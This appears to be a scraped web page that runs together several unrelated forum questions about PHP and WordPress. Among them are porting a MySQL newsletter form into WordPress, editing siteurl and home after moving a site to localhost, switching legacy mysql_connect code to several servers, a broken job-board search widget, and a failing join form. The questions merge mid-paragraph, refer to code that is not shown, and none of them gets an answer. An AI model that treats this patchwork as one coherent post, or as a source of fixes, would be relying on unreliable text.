PHP - Moving Php Code From Html Site To Wordpress

I'm currently in the process of re-developing a website for a client in Wordpress. I've completed the work apart from the fact that on the old site the client has a webpage with an email subscription form for subscribing to a newsletter. The form takes a 'Name' and 'Email Address' and writes these to a MySQL database in the back end. I've tried adding the code to a page in wordpress and have a few plugins which allow PHP code execution on both the sidebar and page but when the button is clicked to submit the subscription nothing appears to happen as on the origonal page. I really need to know whether this type of code could be imported into Wordpress and made to work or how to go about writing a wordpress page that will write to the same database. Any advice on this would be helpful as I'm not a strong php coder. i portet over a wordpress site to localhost. (an opensuse linux-box) all went nice and was very smooth to do so. after porting over the files and the db; i added the db-name and user-name etc. but nothing more. then i looked at the site http://localhost/mysite i saw the site - but only once - that is very very interesting. i read that i have to do more. Probably these changes - mentioned below are mandantory in order to avoid a blank page cf: https://managewp.com...#comment-148613 The two fields you need to edit are “siteurl” (highlighted above) and “home” (which you may need to navigate to the second page to find). Just click the “Edit” buttons next to each field, and replace the URL contained in “option_value” with “http://localhost/yourfoldername/”. That’s it! If you now navigate to “http://localhost/yourfoldername/”, your site should load up in all its glory. Please note that if you use custom permalinks, you will need to change them to default (in the WordPress > Settings > Permalinks screen) in order for internal links on your site to work. You can of course change the permalinks back to their custom form at any time. question: is this true? Do i need to make these changes to avoid a blank page!? We have a 10 year old system that has 100's of php files that all connect to a central database using a single shared php include file that does a mysql_connect before any other code executes

We never used the returned connection id (link identifier) from the mysql_connect function call as it was always implied in every subsequent mysql_query statement etc.
Now we've moved some of our bigger tables to a separate server, so we have to update small areas of some files that need to connect to this other system and send the old existing query to the new server instead of to the main server and process the results
So, going back through hundreds of files and converting mysql_query($string) to mysql_query($string, $connection1) is not practical
Possible solution one: anytime I need to use the new server I do this

Possible solution two: modify the master include file

and then anytime I need to use the new database I have to go back and modify all of the mysql_query,mysql_affected_rows, etc to reference the $new_server link identifier
solution one seems much simpler, but all of the mysql_connect reconnections I assume will be extremely inefficient
solution two seems cleaner but if I miss one mysql_ statement that needs the new connection object as a reference, the code will completely break or worse yet it will produce unexpected results
Example: If I miss converting a mysql_errno() function that really needs to now be mysql_errno($new_server) it would cause major issues.
So, I'm wondering if others have faced this dilema of migrating single mysql_connect code to multi mysql_connect mode and if there is a better way of going about implementing it.

Hi - I'm using the WP Job Boards plugin for Wordpress. I've been given this code to create a quick search form to place in a widget. I've tried to paste the code in a sidebar widget and apparently after somebody inputs the keyword and location they should be sent to the results page which will show their results, however, it's not doing that, just showing me a 'page cannot be found' result.
Can anybody help me out with correcting the code?

The form is filled out multiple times per session. The form when filled out will generate an ID that is used to track the form submissions until completed. The problem that I'm running into is that the code is using a URL structure that breaks on the install.
I'm not sure what to tell the code to look for as the URL.

I wanted to develop a Wordpress plugin. There's a few existing plugins for the subject I wanted to code. I thought I would get some inspiration by looking at the code. It's a gigantic mess of spaghetti! The code I looked at, looks like it's been made using an IDE. There seems to be so many folders and files - it's crazy. Others I looked at seem to be similar. It seems like an enterprise application. I'm more than capable of writing a spec and coding myself. The only thing I'm missing would be Wordpress practices - setting up tables and using hooks and other things. Any advice? Or do I just get dirty and sink my head into the code and untangle? This does generate a hyperlink, however when I click it, I get: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '=' at line 2
I understand for this code to work the page has to be saved in php. I thought wordpress did this automatically?
Can anyone help please? Also, please bear in mind I am using the Optimize Press plugin.

new to php and taken on the on the challenge of a web site written years ago, using old code. Various parts are failing but the main issue is the join form. I have gone over and over it but I cannot find the issue. I’ve asked else where but just been told to post the error. The only error I get is that the fields are not filled in, when they are. If I post code ( if it allows ) can someone please help me? If anybody could give me code for that gets site views, that would be really nice. I have a lot of garbly gook in my zen cart.
